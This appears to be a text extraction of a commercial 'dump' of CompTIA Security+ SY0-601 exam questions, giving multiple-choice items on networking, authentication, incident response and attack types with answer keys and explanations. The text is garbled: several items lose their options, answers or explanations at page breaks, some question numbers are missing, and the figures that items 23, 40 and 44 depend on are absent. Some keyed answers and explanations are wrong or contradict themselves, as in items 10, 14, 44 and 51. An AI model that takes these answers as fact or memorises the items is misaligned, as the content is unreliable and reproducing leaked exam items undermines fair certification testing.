SY0-601 - Dumpsbase 45
SY0-601 - Dumpsbase 45
SY0-601 - Dumpsbase 45
BASE
QUESTION & ANSWER
HIGHER QUALITY
BETTER SERVICE
Exam : SY0-601
Version : V22.02
1 / 142
The safer , easier way to help you pass any IT exams.
1.During an incident a company CIRT determine it is necessary to observe the continued network-based
transaction between a callback domain and the malware running on an enterprise PC.
Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral
spread and the risk that the adversary would notice any changes?
A. Physical move the PC to a separate internet pint of presence
B. Create and apply micro segmentation rules.
C. Emulate the malware in a heavily monitored DM Z segment.
D. Apply network blacklisting rules for the adversary domain
Answer: C
Explanation:
To observe the continued network-based transaction between a callback domain and the malware
running on an enterprise PC while reducing the risk of lateral spread and the risk that the adversary
would notice any changes, the best technique to use is to emulate the malware in a heavily monitored
DMZ segment. This is a secure environment that is isolated from the rest of the network and can be
heavily monitored to detect any suspicious activity. By emulating the malware in this environment, the
activity can be observed without the risk of lateral spread or detection by the adversary. References:
https://www.sans.org/blog/incident-response-fundamentals-why-is-the-dmz-so-important/
2.A desktop support technician recently installed a new document-scanning software program on a
computer. However, when the end user tried to launch the program, it did not respond.
Which of the following is MOST likely the cause?
A. A new firewall rule is needed to access the application.
B. The system was quarantined for missing software updates.
C. The software was not added to the application whitelist.
D. The system was isolated from the network due to infected software
Answer: C
Explanation:
The most likely cause of the document-scanning software program not responding when launched by the
end user is that the software was not added to the application whitelist. An application whitelist is a list of
approved software applications that are allowed to run on a system. If the software is not on the whitelist,
it may be blocked from running by the system's security policies. Adding the software to the whitelist
should resolve the issue and allow the program to run.
References: https://www.techopedia.com/definition/31541/application-whitelisting
3.A cybersecurity administrator needs to allow mobile BYOD devices to access network resources. As
the devices are not enrolled to the domain and do not have policies applied to them, which of the
following are best practices for authentication and infrastructure security? (Select TWO).
A. Create a new network for the mobile devices and block the communication to the internal network and
servers
B. Use a captive portal for user authentication.
C. Authenticate users using OAuth for more resiliency
D. Implement SSO and allow communication to the internal network
E. Use the existing network and allow communication to the internal network and servers.
F. Use a new and updated RADIUS server to maintain the best solution
2 / 142
The safer , easier way to help you pass any IT exams.
Answer: B,C
Explanation:
When allowing mobile BYOD devices to access network resources, using a captive portal for user
authentication and authenticating users using OAuth are both best practices for authentication and
infrastructure security. A captive portal requires users to authenticate before accessing the network and
can be used to enforce policies and restrictions. OAuth allows users to authenticate using third-party
providers, reducing the risk of password reuse and credential theft. References: CompTIA Security+
Study Guide, pages 217-218, 225-226
4.A major clothing company recently lost a large amount of proprietary information. The security officer
must find a solution to ensure this never happens again.
Which of the following is the BEST technical implementation to prevent this from happening again?
A. Configure DLP solutions
B. Disable peer-to-peer sharing
C. Enable role-based
D. Mandate job rotation
E. Implement content filters
Answer: A
Explanation:
Data loss prevention (DLP) solutions can prevent the accidental or intentional loss of sensitive data. DLP
tools can identify and protect sensitive data by classifying and categorizing it, encrypting it, or blocking it
from being transferred outside the organization's network.
5.Which of the following controls would provide the BEST protection against tailgating?
A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage
Answer: A
Explanation:
Access control vestibules, also known as mantraps or airlocks, are physical security features that require
individuals to pass through two or more doors to enter a secure area.
They are effective at preventing tailgating, as only one person can pass through each door at a time.
References:
✑ https://www.comptia.org/content/guides/what-is-a-mantrap
✑ CompTIA Security+ Study Guide, Sixth Edition (SY0-601), page 222
6.An organization would like to remediate the risk associated with its cloud service provider not meeting
its advertised 99.999% availability metrics.
Which of the following should the organization consult for the exact requirements for the cloud provider?
A. SLA
B. BPA
C. NDA
D. MOU
3 / 142
The safer , easier way to help you pass any IT exams.
Answer: A
Explanation:
The Service Level Agreement (SLA) is a contract between the cloud service provider and the
organization that stipulates the exact requirements for the cloud provider. It outlines the level of service
that the provider must deliver, including the minimum uptime percentage, support response times, and
the remedies and penalties for failing to meet the agreed-upon service levels.
7.An enterprise has hired an outside security firm to facilitate penetration testing on its network and
applications. The firm has agreed to pay for each vulnerability that ts discovered.
Which of the following BEST represents the type of testing that is being used?
A. White-box
B. Red-leam
C. Bug bounty
D. Gray-box
E. Black-box
Answer: C
Explanation:
Bug bounty is a type of testing in which an organization offers a reward or compensation to anyone who
can identify vulnerabilities or security flaws in their network or applications. The outside security firm has
agreed to pay for each vulnerability found, which is an example of a bug bounty program.
8.A network analyst is investigating compromised corporate information. The analyst leads to a theory
that network traffic was intercepted before being transmitted to the internet.
The following output was captured on an internal host:
Based on the IoCS, which of the following was the MOST likely attack used to compromise the network
communication?
A. Denial of service
B. ARP poisoning
C. Command injection
D. MAC flooding
Answer: B
Explanation:
ARP poisoning (also known as ARP spoofing) is a type of attack where an attacker sends falsified ARP
messages over a local area network to link the attacker's MAC address with the IP address of another
host on the network. References: CompTIA Security+ Certification Exam Objectives - 2.5 Given a
scenario, analyze potential indicators to determine the type of attack. Study Guide: Chapter 6, page 271.
9.A security engineer needs to build @ solution to satisfy regulatory requirements that stale certain
4 / 142
The safer , easier way to help you pass any IT exams.
critical servers must be accessed using MFA However, the critical servers are older and are unable to
support the addition of MFA.
Which of te following will the engineer MOST likely use to achieve this objective?
A. A forward proxy
B. A stateful firewall
C. A jump server
D. A port tap
Answer: C
Explanation:
A jump server is a secure host that allows users to access other servers within a network. The jump
server acts as an intermediary, and users can access other servers via the jump server after
authenticating with MFA.
10.As part of the building process for a web application, the compliance team requires that all PKI
certificates are rotated annually and can only contain wildcards at the secondary subdomain level.
Which of the following certificate properties will meet these requirements?
A. HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022
C. HTTPS:// app1.comptia.org, Valid from April 10 00:00:00 2021-April 8 12:00:00 2022
D. HTTPS://.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00
Answer: A
Explanation:
PKI certificates are digital certificates that use public key infrastructure (PKI) to verify the identity and
authenticity of a sender and a receiver of data1. PKI certificates can be used to secure web applications
with HTTPS, which is a protocol that encrypts and protects the data transmitted over the internet1.
One of the properties of PKI certificates is the domain name, which is the name of the website or web
application that the certificate is issued for2. The domain name can be either a specific name, such as
app1.comptia.org, or a wildcard name, such as *.comptia.org2. A wildcard name means that the
certificate can be used with multiple subdomains of a domain, such as payment.comptia.org or
contact.comptia.org2.
Another property of PKI certificates is the validity period, which is the time span during which the
certificate is valid and can be used3. The validity period is determined by the certificate authority (CA)
that issues the certificate, and it usually ranges from one to three years3. The validity period can be
checked by looking at the valid from and valid to dates on the certificate3.
Based on these properties, the certificate that will meet the requirements of rotating annually and only
containing wildcards at the secondary subdomain level is A. HTTPS://*.comptia.org, Valid from April 10
00:00:00 2021 - April 8 12:00:00 2022. This certificate has a wildcard character (*) at the secondary
subdomain level, which means it can be used with any subdomain of comptia.org2. It also has a validity
period of one year, which means it needs to be rotated annually3.
11.A software company is analyzing a process that detects software vulnerabilities at the earliest stage
possible. The goal is to scan the source looking for unsecure practices and weaknesses before the
application is deployed in a runtime environment.
Which of the following would BEST assist the company with this objective?
5 / 142
The safer , easier way to help you pass any IT exams.
12.A security analyst is investigating multiple hosts that are communicating to external IP addresses
during the hours of 2:00 a.m - 4:00 am. The malware has evaded detection by traditional antivirus
software.
Which of the following types of malware is MOST likely infecting the hosts?
A. A RAT
B. Ransomware
C. Polymophic
D. A worm
Answer: A
Explanation:
Based on the given information, the most likely type of malware infecting the hosts is a RAT (Remote
Access Trojan). RATs are often used for stealthy unauthorized access to a victim's computer, and they
can evade traditional antivirus software through various sophisticated techniques. In particular, the fact
that the malware is communicating with external IP addresses during specific hours suggests that it may
be under the control of an attacker who is issuing commands from a remote location. Ransomware,
polymorphic malware, and worms are also possible culprits, but the context of the question suggests that
a RAT is the most likely answer.
13.A new security engineer has started hardening systems. One of the hardening techniques the
engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to
use SCP to transfer files to the NAS, even through the data is still viewable from the user’s PCs.
Which of the following is the most likely cause of this issue?
A. TFTP was disabled on the local hosts
B. SSH was turned off instead of modifying the configuration file
C. Remote login was disabled in the networkd.config instead of using the sshd.conf
D. Network services are no longer running on the NAS
Answer: B
Explanation:
SSH stands for Secure Shell Protocol, which is a cryptographic network protocol that allows secure
remote login and command execution on a network device12. SSH can encrypt both the authentication
information and the data being exchanged between the client and the server2. SSH can be used to
6 / 142
The safer , easier way to help you pass any IT exams.
14.A company has discovered unauthorized devices are using its WiFi network, and it wants
to harden the access point to improve security.
Which of the following configuration should an analysis enable To improve security? (Select TWO.)
A. RADIUS
B. PEAP
C. WPS
D. WEP-EKIP
E. SSL
F. WPA2-PSK
Answer: A,F
Explanation:
To improve the security of the WiFi network and prevent unauthorized devices from accessing the
network, the configuration options of RADIUS and WPA2-PSK should be enabled. RADIUS (Remote
Authentication Dial-In User Service) is an authentication protocol that can be used to control access to
the WiFi network. It can provide stronger authentication and authorization than WEP and WPA. WPA2-
PSK (WiFi Protected Access 2 with Pre-Shared Key) is a security protocol that uses stronger encryption
than WEP and WPA. It requires a pre-shared key (PSK) to be entered on each device that wants to
access the network. This helps prevent unauthorized devices from accessing the network.
15.Which of the following identifies the point in time when an organization will recover data in the event
of an outage?
A. SLA
B. RPO
C. MTBF
D. ARO
Answer: B
Explanation:
Recovery Point Objective (RPO) is the maximum duration of time that an organization can tolerate data
loss in the event of an outage. It identifies the point in time when data recovery must begin, and any data
loss beyond that point is considered unacceptable.
Reference: CompTIA Security+ Certification Guide, Exam SY0-601 by Mike Chapple and
David Seidl, Chapter-7: Incident Response and Recovery, Objective 7.2: Compare and
contrast business continuity and disaster recovery concepts, pp. 349-350.
16.An attacker replaces a digitally signed document with another version that goes unnoticed Upon
reviewing the document's contents the author notices some additional verbiage that was not originally in
the document but cannot validate an integrity issue.
Which of the following attacks was used?
A. Cryptomalware
B. Hash substitution
C. Collision
D. Phishing
7 / 142
The safer , easier way to help you pass any IT exams.
Answer: B
Explanation:
This type of attack occurs when an attacker replaces a digitally signed document with another version
that has a different hash value. The author would be able to notice the additional verbiage, however,
since the hash value would have changed, they would not be able to validate an integrity issue.
17.A company recently experienced a major breach. An investigation concludes that customer credit
card data was stolen and exfiltrated through a dedicated business
partner connection to a vendor, who is not held to the same security contral standards.
Which of the following is the MOST likely source of the breach?
A. Side channel
B. Supply chain
C. Cryptographic downgrade
D. Malware
Answer: B
Explanation:
A supply chain attack occurs when a third-party supplier or business partner is compromised, leading to
an attacker gaining unauthorized access to the targeted organization's network. In this scenario, the
dedicated business partner connection to a vendor was used to exfiltrate customer credit card data,
indicating that the vendor's network was breached and used as a supply chain attack vector.
18.Employees at a company are receiving unsolicited text messages on their corporate cell phones. The
unsolicited text messages contain a password reset Link.
Which of the attacks is being used to target the company?
A. Phishing
B. Vishing
C. Smishing
D. Spam
Answer: C
Explanation:
Smishing is a type of phishing attack which begins with an attacker sending a text message to an
individual. The message contains social engineering tactics to convince the person to click on a
malicious link or send sensitive information to the attacker.
Criminals use smishing attacks for purposes like:
Learn login credentials to accounts via credential phishing
Discover private data like social security numbers
Send money to the attacker
Install malware on a phone
Establish trust before using other forms of contact like phone calls or emails
Attackers may pose as trusted sources like a government organization, a person you know, or your
bank. And messages often come with manufactured urgency and time-sensitive threats. This can make it
more difficult for a victim to notice a scam.
Phone numbers are easy to spoof with VoIP texting, where users can create a virtual number to send
and receive texts. If a certain phone number is flagged for spam, criminals can simply recycle it and use
8 / 142
The safer , easier way to help you pass any IT exams.
a new one.
20.A security engineer is reviewing the logs from a SAML application that is configured to use MFA,
during this review the engineer notices a high volume of successful logins that did not require MFA from
users who were traveling internationally. The application, which can be accessed without a VPB, has a
policy that allows time-based tokens to be generated. Users who changed locations should be required
to reauthenticate but have been.
Which of the following statements BEST explains the issue?
A. OpenID is mandatory to make the MFA requirements work
B. An incorrect browser has been detected by the SAML application
C. The access device has a trusted certificate installed that is overwriting the session token
D. The user’s IP address is changing between logins, bur the application is not invalidating the token
Answer: D
9 / 142
The safer , easier way to help you pass any IT exams.
appliance. References: CompTIA Security+ Certification Exam Objectives, Exam Domain 2.0:
Technologies and Tools, 2.4 Given a scenario, use appropriate tools and techniques to troubleshoot
security issues, p. 21
22.The security team received a report of copyright infringement from the IP space of the corporate
network. The report provided a precise time stamp for the incident as well as the name of the
copyrighted files. The analyst has been tasked with determining the infringing source machine and
instructed to implement measures to prevent such incidents from occurring again.
Which of the following is MOST capable of accomplishing both tasks?
A. HIDS
B. Allow list
C. TPM
D. NGFW
Answer: D
Explanation:
Next-Generation Firewalls (NGFWs) are designed to provide advanced threat protection by combining
traditional firewall capabilities with intrusion prevention, application control, and other security features.
NGFWs can detect and block unauthorized access attempts, malware infections, and other suspicious
activity. They can also be used to monitor file access and detect unauthorized copying or distribution of
copyrighted material.
A next-generation firewall (NGFW) can be used to detect and prevent copyright infringement by
analyzing network traffic and blocking unauthorized transfers of copyrighted material. Additionally,
NGFWs can be configured to enforce access control policies that prevent unauthorized access to
sensitive resources. References:
✑ CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 6
23.During a forensic investigation, a security analyst discovered that the following command was run on
a compromised host:
24.Which of the following BEST describes the team that acts as a referee during a penetration-testing
exercise?
A. White team
B. Purple team
C. Green team
10 / 142
The safer , easier way to help you pass any IT exams.
D. Blue team
E. Red team
Answer: A
Explanation:
During a penetration testing exercise, the white team is responsible for acting as a referee and providing
oversight and support to ensure that the testing is conducted safely and effectively. They may also be
responsible for determining the rules and guidelines of the exercise, monitoring the progress of the
teams, and providing feedback and insights on the strengths and weaknesses of the organization's
security measures.
25.A systems administrator is considering different backup solutions for the IT infrastructure. The
company is looking for a solution that offers the fastest recovery time while also saving the most amount
of storage used to maintain the backups.
Which of the following recovery solutions would be the BEST option to meet these requirements?
A. Snapshot
B. Differential
C. Full
D. Tape
Answer: B
Explanation:
Differential backup is a type of backup that backs up all data that has changed since the last full backup.
This backup method offers faster recovery than a full backup, as it only needs to restore the full backup
and the differential backup, reducing the amount of data that needs to be restored. It also uses less
storage than a full backup as it only stores the changes made from the last full backup.
26.A company Is planning to install a guest wireless network so visitors will be able to access the
Internet. The stakeholders want the network to be easy to connect to so time is not wasted during
meetings. The WAPs are configured so that power levels and antennas cover only the conference rooms
where visitors will attend meetings.
Which of the following would BEST protect the company's Internal wireless network against visitors
accessing company resources?
A. Configure the guest wireless network to be on a separate VLAN from the company's internal wireless
network
B. Change the password for the guest wireless network every month.
C. Decrease the power levels of the access points for the guest wireless network.
D. Enable WPA2 using 802.1X for logging on to the guest wireless network.
Answer: A
Explanation:
Configuring the guest wireless network on a separate VLAN from the company's internal wireless
network will prevent visitors from accessing company resources.
References: CompTIA Security+ Study Guide: Exam SY0-601, Chapter 4
27.An employee, receives an email stating he won the lottery. The email includes a link that requests a
name, mobile phone number, address, and date of birth be provided to confirm employee's identity
11 / 142
The safer , easier way to help you pass any IT exams.
28.Which of the following function as preventive, detective, and deterrent controls to reduce the risk of
physical theft? (Select TWO).
A. Mantraps
B. Security guards
C. Video surveillance
D. Fences
E. Bollards
F. Antivirus
Answer: A,B
Explanation:
A - a mantrap can trap those personnal with bad intension(preventive), and kind of same as detecting,
since you will know if someone is trapped there(detective), and it can deter those personnal from
approaching as well(deterrent) B - security guards can sure do the same thing as above, preventing
malicious personnal from entering(preventive+deterrent), and notice those personnal as well(detective)
29.Which of the following uses six initial steps that provide basic control over system security by
including hardware and software inventory, vulnerability management, and continuous monitoring to
minimize risk in all network environments?
A. ISO 27701
B. The Center for Internet Security
C. SSAE SOC 2
D. NIST Risk Management Framework
Answer: B
Explanation:
The Center for Internet Security (CIS) uses six initial steps that provide basic control over system
12 / 142
The safer , easier way to help you pass any IT exams.
security, including hardware and software inventory, vulnerability management, and continuous
monitoring to minimize risk in all network environments.
References:
✑ CompTIA Security+ Certification Exam Objectives 1.1: Compare and contrast different types of
security concepts.
✑ CompTIA Security+ Study Guide, Sixth Edition, pages 15-16
30.A backdoor was detected on the containerized application environment. The investigation detected
that a zero-day vulnerability was introduced when the latest container image version was downloaded
from a public registry.
Which of the following is the BEST solution to prevent this type of incident from occurring again?
A. Enforce the use of a controlled trusted source of container images
B. Deploy an IPS solution capable of detecting signatures of attacks targeting containers
C. Define a vulnerability scan to assess container images before being introduced on the environment
D. Create a dedicated VPC for the containerized environment
Answer: A
Explanation:
Enforcing the use of a controlled trusted source of container images is the best solution to prevent
incidents like the introduction of a zero-day vulnerability through container images from occurring again.
References: CompTIA Security+ Study Guide by Emmett Dulaney, Chapter 11: Cloud Security, Container
Security
31.An employee's company account was used in a data breach Interviews with the employee revealed:
• The employee was able to avoid changing passwords by using a previous password again.
• The account was accessed from a hostile, foreign nation, but the employee has never traveled to any
other countries.
Which of the following can be implemented to prevent these issues from reoccuring? (Select TWO)
A. Geographic dispersal
B. Password complexity
C. Password history
D. Geotagging
E. Password lockout
F. Geofencing
Answer: C,F
Explanation:
two possible solutions that can be implemented to prevent these issues from reoccurring are password
history and geofencing12. Password history is a feature that prevents users from reusing their previous
passwords1. This can enhance password security by forcing users to create new and unique passwords
periodically1. Password history can be configured by setting a policy that specifies how many previous
passwords are remembered and how often users must change their passwords1.
Geofencing is a feature that restricts access to a system or network based on the geographic location of
the user or device2. This can enhance security by preventing unauthorized access from hostile or foreign
regions2. Geofencing can be implemented by using GPS, IP address, or other methods to determine the
location of the user or device and compare it with a predefined set of boundaries2.
13 / 142
The safer , easier way to help you pass any IT exams.
32.A security administrator wants to implement a program that tests a user's ability to recognize attacks
over the organization's email system.
Which of the following would be BEST suited for this task?
A. Social media analysis
B. Annual information security training
C. Gamification
D. Phishing campaign
Answer: D
Explanation:
A phishing campaign is a simulated attack that tests a user's ability to recognize attacks over the
organization's email system. Phishing campaigns can be used to train users on how to identify and
report suspicious emails.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 2:
Technologies and Tools, pp. 85-86.
33.Which of the following involves the inclusion of code in the main codebase as soon as it is written?
A. Continuous monitoring
B. Continuous deployment
C. Continuous Validation
D. Continuous integration
Answer: D
Explanation:
Continuous Integration (CI) is a practice where developers integrate code into a shared repository
frequently, preferably several times a day. Each integration is verified by an automated build and
automated tests. CI allows for the detection of errors early in the development cycle, thereby reducing
overall development costs.
34.While reviewing pcap data, a network security analyst is able to locate plaintext usernames and
passwords being sent from workstations to network witches.
Which of the following is the security analyst MOST likely observing?
A. SNMP traps
B. A Telnet session
C. An SSH connection
D. SFTP traffic
Answer: B
Explanation:
The security analyst is likely observing a Telnet session, as Telnet transmits data in plain text format,
including usernames and passwords.
Reference: CompTIA Security+ Certification Exam Objectives, Exam SY0-601, 1.2 Given a scenario,
analyze indicators of compromise and determine the type of malware.
35.A company is required to continue using legacy software to support a critical service.
Which of the following BEST explains a risk of this practice?
14 / 142
The safer , easier way to help you pass any IT exams.
36.After gaining access to a dual-homed (i.e.. wired and wireless) multifunction device by exploiting a
vulnerability in the device's firmware, a penetration tester then gains shell access on another networked
asset.
This technique is an example of:
A. privilege escalation
B. footprinting
C. persistence
D. pivoting.
Answer: D
Explanation:
The technique of gaining access to a dual-homed multifunction device and then gaining shell access on
another networked asset is an example of pivoting. References: CompTIA Security+ Study Guide by
Emmett Dulaney, Chapter 8: Application, Data, and Host Security, Enumeration and Penetration Testing
37.Per company security policy, IT staff members are required to have separate credentials to perform
administrative functions using just-in-time permissions.
Which of the following solutions is the company Implementing?
A. Privileged access management
B. SSO
C. RADIUS
D. Attribute-based access control
Answer: A
Explanation:
The company is implementing privileged access management, which provides just-in-time permissions
for administrative functions.
38.Which of the following environment utilizes dummy data and is MOST to be installed locally on a
system that allows to be assessed directly and modified easily wit each build?
A. Production
B. Test
C. Staging
15 / 142
The safer , easier way to help you pass any IT exams.
D. Development
Answer: D
Explanation:
The environment that utilizes dummy data and is most likely to be installed locally on a system that
allows it to be assessed directly and modified easily with each build is the development environment.
The development environment is used for developing and testing software and applications. It is typically
installed on a local system, rather than on a remote server, to allow for easy access and modification.
Dummy data can be used in the development environment to simulate real-world scenarios and test the
software's functionality.
References: https://www.techopedia.com/definition/27561/development-environment
39.A security researcher is using an adversary's infrastructure and TTPs and creating a named group to
track those targeted.
Which of the following is the researcher MOST likely using?
A. The Cyber Kill Chain
B. The incident response process
C. The Diamond Model of Intrusion Analysis
D. MITRE ATT&CK
Answer: D
Explanation:
The researcher is most likely using the MITRE ATT&CK framework. MITRE ATT&CK is a globally
accessible knowledge base of adversary tactics, techniques, and procedures (TTPs) based on real-world
observations. It helps security teams better understand and track adversaries by creating a named
group, which aligns with the scenario described in the question. The framework is widely recognized and
referenced in the cybersecurity industry, including in CompTIA Security+ study materials.
References: 1. CompTIA Security+ Certification Exam Objectives (SY0-601):
https://www.comptia.jp/pdf/Security%2B%20SY0-601%20Exam%20Objectives.pdf 2. MITRE ATT&CK:
https://attack.mitre.org/
MITRE ATT&CK is a knowledge base of adversary tactics, techniques, and procedures (TTPs) that are
observed in real-world cyberattacks. MITRE ATT&CK provides a common framework and language for
describing and analyzing cyber threats and their behaviors.
MITRE ATT&CK also allows security researchers to create named groups that track specific adversaries
based on their TTPs.
The other options are not correct because:
✑ A. The Cyber Kill Chain is a model that describes the stages of a cyberattack from reconnaissance to
exfiltration. The Cyber Kill Chain does not provide a way to create named groups based on adversary
TTPs.
✑ B. The incident response process is a set of procedures and guidelines that defines how an
organization should respond to a security incident. The incident response process does not provide a
way to create named groups based on adversary TTPs.
✑ C. The Diamond Model of Intrusion Analysis is a framework that describes the four core features of
any intrusion: adversary, capability, infrastructure, and victim. The Diamond Model of Intrusion Analysis
does not provide a way to create named groups based on adversary TTPs.
According to CompTIA Security+ SY0-601 Exam Objectives 1.1 Compare and contrast different types of
16 / 142
The safer , easier way to help you pass any IT exams.
40.A security analyst was deploying a new website and found a connection attempting to authenticate on
the site's portal. While Investigating.
The incident, the analyst identified the following Input in the username field:
41.A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no
patches are currently available to resolve the issue. The security administrator is concerned tf servers in
the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the
service on the servers, as SMB is used by a number of internal systems and applications on the LAN.
Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a
workaround to protect the servers? (Select TWO).
A. 135
B. 139
C. 143
D. 161
E. 443
F. 445
Answer: B,F
Explanation:
To protect the servers in the company’s DMZ from external attack due to the new vulnerability in the
SMB protocol on the Windows systems, the security administrator should block TCP ports 139 and 445
for all external inbound connections to the DMZ. SMB uses TCP port 139 and 445. Blocking these ports
will prevent external attackers from exploiting the vulnerability in SMB protocol on Windows systems.
17 / 142
The safer , easier way to help you pass any IT exams.
Blocking TCP ports 139 and 445 for all external inbound connections to the DMZ can help protect the
servers, as these ports are used by SMB protocol. Port 135 is also associated with SMB, but it is not
commonly used. Ports 143 and 161 are associated with other protocols and services.
Reference: CompTIA Security+ Certification Exam Objectives, Exam SY0-601, 1.4 Compare and
contrast network architecture and technologies.
42.The technology department at a large global company is expanding its Wi-Fi network infrastructure at
the headquarters building.
Which of the following should be closely coordinated between the technology, cybersecurity, and
physical security departments?
A. Authentication protocol
B. Encryption type
C. WAP placement
D. VPN configuration
Answer: C
Explanation:
WAP stands for wireless access point, which is a device that allows wireless devices to connect to a
wired network using Wi-Fi or Bluetooth. WAP placement refers to where and how WAPs are installed in a
building or area.
WAP placement should be closely coordinated between the technology, cybersecurity, and physical
security departments because it affects several aspects of network performance and security, such as:
✑ Coverage: WAP placement determines how well wireless devices can access the network throughout
the building or area. WAPs should be placed in locations that provide optimal signal strength and avoid
interference from other sources.
✑ Capacity: WAP placement determines how many wireless devices can connect to the network
simultaneously without affecting network speed or quality. WAPs should be placed in locations that
balance network load and avoid congestion or bottlenecks.
✑ Security: WAP placement determines how vulnerable wireless devices are to eavesdropping or
hacking attacks from outside or inside sources. WAPs should be placed in locations that minimize
exposure to unauthorized access and maximize encryption and authentication methods.
43.Which of the technologies is used to actively monitor for specific file types being transmitted on the
network?
A. File integrity monitoring
B. Honeynets
C. Tcpreplay
D. Data loss prevention
Answer: D
Explanation:
Data loss prevention (DLP) is a technology used to actively monitor for specific file types being
transmitted on the network. DLP solutions can prevent the unauthorized transfer of sensitive information,
such as credit card numbers and social security numbers, by monitoring data in motion.
References: CompTIA Security+ Study Guide, Exam SY0-601, 4th Edition, Chapter 2:
Technologies and Tools, pp. 99-102.
18 / 142
The safer , easier way to help you pass any IT exams.
44.A security analyst has received several reports of an issue on an internal web application. Users state
they are having to provide their credentials twice to log in. The analyst checks with the application team
and notes this is not an expected behavior.
After looking at several logs, the analyst decides to run some commands on the gateway and obtains the
following output:
Which of the following BEST describes the attack the company is experiencing?
A. MAC flooding
B. URL redirection
C. ARP poisoning
D. DNS hijacking
Answer: C
Explanation:
The output of the “netstat -ano” command shows that there are two connections to the same IP address
and port number. This indicates that there are two active sessions between the client and server.
The issue of users having to provide their credentials twice to log in is known as a double login prompt
issue. This issue can occur due to various reasons such as incorrect configuration of authentication
settings, incorrect configuration of web server settings, or issues with the client’s browser.
Based on the output of the “netstat -ano” command, it is difficult to determine the exact cause of the
issue. However, it is possible that an attacker is intercepting traffic between the client and server and
stealing user credentials. This type of attack is known as C. ARP poisoning.
ARP poisoning is a type of attack where an attacker sends fake ARP messages to associate their MAC
address with the IP address of another device on the network. This allows them to intercept traffic
between the two devices and steal sensitive information such as user credentials.
45.An organization is moving away from the use of client-side and server-side certificates for EAR The
company would like for the new EAP solution to have the ability to detect rogue access points.
Which of the following would accomplish these requirements?
A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS
Answer: B
Explanation:
EAP-FAST (Extensible Authentication Protocol-Flexible Authentication via Secure Tunneling) supports
mutual authentication and is designed to simplify the deployment of strong, password-based
authentication. EAP-FAST includes a mechanism for detecting rogue access points. References:
✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 4
19 / 142
The safer , easier way to help you pass any IT exams.
46.A security engineer needs to create a network segment that can be used for servers thal require
connections from untrusted networks.
Which of the following should the engineer implement?
A. An air gap
B. A hot site
C. A VUAN
D. A screened subnet
Answer: D
Explanation:
A screened subnet is a network segment that can be used for servers that require connections from
untrusted networks. It is placed between two firewalls, with one firewall facing the untrusted network and
the other facing the trusted network. This setup provides an additional layer of security by screening the
traffic that flows between the two networks. References: CompTIA Security+ Certification Guide, Exam
SY0-501
47.A security administrator is working on a solution to protect passwords stored in a database against
rainbow table attacks.
Which of the following should the administrator consider?
A. Hashing
B. Salting
C. Lightweight cryptography
D. Steganography
Answer: B
Explanation:
Salting is a technique that adds random data to a password before hashing it. This makes the hash
output more unique and unpredictable, and prevents attackers from using precomputed tables (such as
rainbow tables) to crack the password hash. Salting also reduces the risk of collisions, which occur when
different passwords produce the same hash.
References:
https://www.comptia.org/certifications/security#examdetails
https://www.comptia.org/content/guides/comptia-security-sy0-601-exam-objectives
https://auth0.com/blog/adding-salt-to-hashing-a-better-way-to-store-passwords/
20 / 142
The safer , easier way to help you pass any IT exams.
with malware. In contrast, TOTP (Time-based One-Time Password), HOTP (HMAC-based One-Time
Password), and token keys are more secure as they rely on cryptographic algorithms or physical devices
to generate one-time use codes, which are less susceptible to interception or unauthorized access.
Reference: 1. National Institute of Standards and Technology (NIST). (2017). Digital Identity Guidelines:
Authentication and Lifecycle Management (NIST SP 800-63B).
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63b.pdf
50.The SIEM at an organization has detected suspicious traffic coming a workstation in its internal
network. An analyst in the SOC the workstation and discovers malware that is associated with a botnet is
installed on the device A review of the logs on the workstation reveals that the privileges of the local
account were escalated to a local administrator.
To which of the following groups should the analyst report this real-world event?
A. The NOC team
B. The vulnerability management team
C. The CIRT
D. The read team
Answer: C
Explanation:
The Computer Incident Response Team (CIRT) is responsible for handling incidents and ensuring that
the incident response plan is followed. References: CompTIA Security+ Study Guide, Exam SY0-601,
Chapter 9
51.The Chief Information Security Officer (CISO) has decided to reorganize security staff to concentrate
on incident response and to outsource outbound Internet URL categorization and filtering to an outside
company. Additionally, the CISO would like this solution to provide the same protections even when a
company laptop or mobile device is away from a home office.
Which of the following should the CISO choose?
A. CASB
B. Next-generation SWG
C. NGFW
D. Web-application firewall
21 / 142
The safer , easier way to help you pass any IT exams.
Answer: B
Explanation:
The solution that the CISO should choose is Next-generation Secure Web Gateway (SWG), which
provides URL filtering and categorization to prevent users from accessing malicious sites, even when
they are away from the office. NGFWs are typically cloud-based and offer multiple security layers,
including malware detection, intrusion prevention, and data loss prevention.
References:
✑ https://www.paloaltonetworks.com/cyberpedia/what-is-a-next-generation-secure-web-gateway-ng-swg
✑ CompTIA Security+ Study Guide Exam SY0-601, Chapter 4
52.After a phishing scam fora user's credentials, the red team was able to craft payload to deploy on a
server. The attack allowed the installation of malicious software that initiates a new remote session
Which of the following types of attacks has occurred?
A. Privilege escalation
B. Session replay
C. Application programming interface
D. Directory traversal
Answer: A
Explanation:
"Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating
system or software application to gain elevated access to resources that are normally protected from an
application or user." In this scenario, the red team was able to install malicious software, which would
require elevated privileges to access and install. Therefore, the type of attack that occurred is privilege
escalation. References: CompTIA Security+ Study Guide, pages 111-112
53.Which of the following would be BEST for a technician to review to determine the total risk an
organization can bear when assessing a "cloud-first" adoption strategy?
A. Risk matrix
B. Risk tolerance
C. Risk register
D. Risk appetite
Answer: B
Explanation:
To determine the total risk an organization can bear, a technician should review the organization's risk
tolerance, which is the amount of risk the organization is willing to accept. This information will help
determine the organization's "cloud-first" adoption strategy.
References: CompTIA Security+ Certification Exam Objectives (SY0-601)
54.During an investigation, the incident response team discovers that multiple administrator accounts
were suspected of being compromised. The host audit logs indicate a repeated brute-force attack on a
